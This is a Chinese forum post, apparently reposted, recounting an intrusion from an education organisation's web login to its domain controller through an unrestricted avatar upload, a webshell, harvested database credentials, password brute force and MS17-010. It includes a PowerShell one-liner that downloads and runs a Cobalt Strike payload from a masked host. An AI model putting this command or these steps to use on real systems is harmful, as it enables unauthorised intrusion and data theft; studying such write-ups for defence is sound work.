中国网络渗透测试联盟
标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin 时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程
8 @' ^2 p( v- ]9 d$ `. c9 N+ E/ a! F
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
1 y+ u; b# f3 B: B, u* a' w% w
5 D: `* S s! w8 }0 f
: W# l0 Y$ z' J 9 N0 f, w0 ~) E- D
0 O) D0 Z y5 z1 A; G0 Q
9 y; M6 E; D; |! b X, }
正文6 w. s2 x, w3 ~5 T) o" \/ O
4 ]) L& `. O2 Y1 L8 v/ e
9 i3 Y1 v1 k* g
" A" r3 _9 m$ b- ? |. H/ s' f
; P$ o! h7 I( b
6 n3 Q& m* Z% W4 W5 X6 V C 目标:www.xxxx.com(一家教育机构)
0 D' S2 K8 R x/ |! d+ ?+ o# r' l" Q
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
5 D5 u" e+ Q$ u! d. K9 v7 a
% W' d& t% ^) E
7 G3 H( `) g, X
* e( i" ]" V( `6 g c8 Z/ ^. q7 C
+ e' H6 U8 S4 M: S& j6 q( e ]6 @; s
% o! x% {, q, U( ~6 L* D 进行了简单的信息搜集
g" o3 m7 E/ P1 V9 U- Q( g; p
$ S; o& \6 i5 R
! O$ w1 s- g) U H
. r- U* \/ d6 ]0 ]' W# J6 w- ]3 x% |
" x: m4 |! R+ \9 c/ t 子域名搜集
3 Y: X& k- ^% Z
, T0 K N8 i' j0 _
4 e. H6 @! T. Y6 c8 ?/ c j
% B$ U9 [) R& ]: z
/ s8 y0 Y9 n& ^# b! k
4 n- }7 e6 M9 L# |" t! ^" p1 q fofa找资产
& ]( X: l- G& a2 I8 y$ Z" {
- W3 P0 N; ]7 v: I" T# B2 X- E% O/ T3 y
7 O. ^) _5 `) w" C- }9 o* l" [; d
9 k2 N$ J' F& @ d5 ^* h2 @
6 `" E3 M, d5 y o
& m1 I8 p4 f$ z( y' m& N( h0 I; ?4 d
5 O- L2 {# B) e* q
一共七个资产。去重之后只有两个。
: y* ~" G' h" u- j
: K- p6 s: N1 _0 f l; n! g4 X# J$ @ z( T2 u$ L) A3 k( h4 _
. I2 I; E! k [ z# V6 g) P) h
' z, v# Q0 }- f9 o( I
目录探测* e# i9 G- b* g9 F" P: {
' { @/ j5 V {* Q2 n
: }. f( y/ I1 k N! K3 E' n$ }
" z& \5 J! Z) o/ _+ M& H% e" R% u
" K8 \8 j2 r, @! B0 \
* h, d7 B3 |' A& x 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* e" G+ S, V( M3 |" ~
% w# l7 B8 o5 T0 ?
3 L5 S( F3 E" C1 `4 W2 F
9 c6 M* G+ H" Z: N+ h2 H& D0 R
3 E/ i- h3 Z( W 我又尝试了通过修改返回包来绕过登录界面
3 U8 q1 q" a% V. z0 }
" R* X8 v# {& \5 d8 t' A
! r. h6 v) v* {' S
- Y# M1 d( i6 w+ y/ a; C+ [
; R: L3 V+ t& r0 O& Y G6 R0 S
# T' |0 x1 I- F$ z9 V! G$ S! g1 T5 D6 D 还是不行,尝试注入无果* t- O. u# B b
) R7 w; F8 U$ J. U
z; S3 I- w* [# z
" I- [; H' R; h' l' p
* ?. q( `8 d ] u$ W8 V t* c' k. G1 ~! L" y4 l$ W3 u ]
不过我目录探测出了一处Spring信息泄露
: O1 q0 O4 G( L$ q2 J J/ h
' N5 M8 I& f. G- k4 \8 x4 l. O
6 B* K1 V) i2 `1 \3 N
, F2 G# p5 i- t2 E$ N! v
. y$ j& o1 o6 z, Y5 U" U. l
* R9 Z. k# x: _1 E, l
m) Z* t% ?! Z6 V0 r" D
/ ?. d$ X" y5 R! K7 s 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录" H1 s/ J1 O! o% G6 F D" f/ E
* N$ O3 {6 H6 d. h j2 u
3 I+ p( ~. f6 i5 h4 m
( D6 s, Y6 }2 M' W% ?$ n: x
# A( R f/ X/ i* }( y1 U: U& w/ d
6 ]* Z, _1 y: Y4 j/ v* g5 }5 V 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
) m4 U& d2 ~% k% M
, p$ B4 M% ]9 s0 `" }1 c
) ^4 Z1 B. \3 \/ B
7 e. l1 r" T' y
$ ~% R$ i2 V- ]' Z$ l4 \7 l5 U& V/ I- L u8 u
获取有些师傅到这一步就手机抓包电脑测了。
. G( a2 h+ Q* Y$ K0 C
; O# }: |& D0 {( z7 K' f1 w! U
" J& C. |3 x* c. `% F; W Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
) Z( `9 U& q& }1 L8 U
4 F6 W4 ]. q( Q, I
' U6 x O% V0 q+ z$ j3 R9 H& v, ]% m 其中在一个公众号发现了小程序,可以进行注册。
1 H$ ?7 G4 b! h* L9 h1 O$ A
B' ?3 c5 S- w3 s
$ J9 ?& E! J6 L# X* M0 r
看到了头像上传,尝试上传获取WebShell( ^4 k8 m& G) v
# D; |( H( ~9 f" U
5 E, `: P% Z$ r$ q
& t; R4 V" V* s. e9 K8 j$ K" j( B" B
" I* q/ y, S* l2 S
, G5 ~# H& E. u" ~+ Q. C 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问0 j7 ]/ C( p0 T4 b
$ A7 U1 o6 U8 h1 M' P0 k
6 p }2 a) M) X5 Y6 k% B" X0 w
* y" C- b5 q: I' s! w; W# d0 r8 O
2 _5 Q: C$ A& l- [# a
8 h& k, Z! X& r, ~1 c 然后上了大马
4 ^* [! [5 V# E8 ~: t( Q
1 n- A, a/ I( ?6 s$ O
; `( R M# U% H
: `) {* o- n5 C9 M
, a! Q( u* A1 @; b
, W6 ?) }& j% Q( |0 l' B
8 E$ b" D2 V) l$ X; n
4 Z* A8 M$ _! b0 b4 r' Q% w) h$ A2 y; d2 C
通过翻找文件发现数据库账号密码
; _2 I6 b9 Q/ i) g, ~
+ Q2 o6 L8 T( ]4 T0 z
e6 p, X9 P d6 ]' d2 g
- ]$ e+ K8 y$ J* w5 ?; o* g
* u$ R N- Y6 K$ W; S1 r7 Y6 d
8 g9 i2 C$ _- {1 f/ } U& a --内网渗透
- O' h# V, \+ G( V( s" ~. J
/ T4 s a# Q9 J7 o
# \ M; R! v) K7 H( z! W: A 直接通过powershell执行 cs上线
8 u R# X- |5 Z! C4 E2 b+ C
. X* i% g! a9 ^7 g" g
& p1 q. O4 Q7 z4 \ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
, T8 g; L; m: ~* g9 r0 R3 \
! r9 B% w& U6 d6 W& L* D5 I4 o+ k2 G+ _ h& C1 ^! y
' h3 h$ P. w1 a
# {7 u% \. w: F; ]# R9 }7 y, v4 j
, u/ l; ` a$ R9 s7 X4 N
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
1 t# x6 h+ a$ U, B F
5 S: A& a) V0 c) a" V! n; c
) Q) A0 W9 v* h1 G, j1 B* ?) N
! Y& f" X/ I+ {, U/ s
- J9 I+ ? _( h3 w
, O9 I! s+ g% l
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% [. J7 ~1 A! k2 `6 u/ e" X
* z3 Q6 W# p% U
! N; s1 B) z8 g. ^9 B" S
3 g% Y- v: N/ N" s& z3 K. S. J
+ R* g$ L- p4 a( N: P* U% M2 [( q) t& ~" s5 o5 C
6 J9 a/ _; q( o2 X" D. W
) @$ W% ?" r6 s& c' j- Y& \
/ V! o. b! ^$ J9 J
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
2 n3 D8 z) B3 T4 o
' w/ Z6 B$ T0 v4 @) P* h
d( Q! R( x9 Z7 a8 V* e
7 ^8 }, \1 S+ s+ J# x
+ U9 A; W6 X! Z4 F$ Z0 Y1 f: L
% a& e" k5 n5 V% g# {
( |: R/ } D; \2 K8 y T+ ?% t
3 X* g" t* E# e* ?
7 I2 L! x K4 T! \) V( F1 m" y
6 b) U- x. d) [, S5 v9 h" d* {& y( p9 {0 d
+ D" Q& h* w- d* p$ X% F) |: |2 M% W& I/ r9 ~
) A& a% @: k. m
5 ^+ h( D4 |4 a" g4 X2 S
! h7 c( c6 ?$ s9 |; B; T. u/ |$ G# K 小结
5 ~# j8 F7 T' Q1 x8 d! |% Z4 c3 q
; o: C: m1 I$ e, Z+ b. M
. p& R6 Z4 t) N( u5 ~
# Z( k( F2 `2 D, f
7 A) D6 q1 ]- D! S$ S% Y% z+ Q9 e& t
& z5 a, y# R! P. ]& U 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
$ T2 K& H9 B9 z/ t
7 c* `; H1 O) m! M; Q; U2 _2 ~& g6 e, _: h9 D! }8 Q4 X, ]* ?: z
0 `+ K4 ]! m; w$ u7 p- H; ]8 ^
& `9 W2 v4 I5 C9 q; x
8 W( T U: u, H k- f: C -
% ]0 ?# ?: T6 P1 ~ 8 i6 \3 Q5 q: k* d9 O% E
, B* v1 ~. q7 P" s% a: c -
+ Y" a6 l' S8 b/ K2 c0 _
3 s/ i7 h, A* t R
* {$ H& y( a9 P* r) Q+ @: f2 K) |
2 e O |) e! k
) _! {" z1 N% |* V% {* Q, _0 c' y* \ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html3 E H5 x# D* F9 ^3 s
2 q7 _* [% U: i% ?( l+ w2 @/ X: A7 i" w/ ?
% B$ F. q; a) Q! L7 t
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) |
Powered by Discuz! X3.2 |